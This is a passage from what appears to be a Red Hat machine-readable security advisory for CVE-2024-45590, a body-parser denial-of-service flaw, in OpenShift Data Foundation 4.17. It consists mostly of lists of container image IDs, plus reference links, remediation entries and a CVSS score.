"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
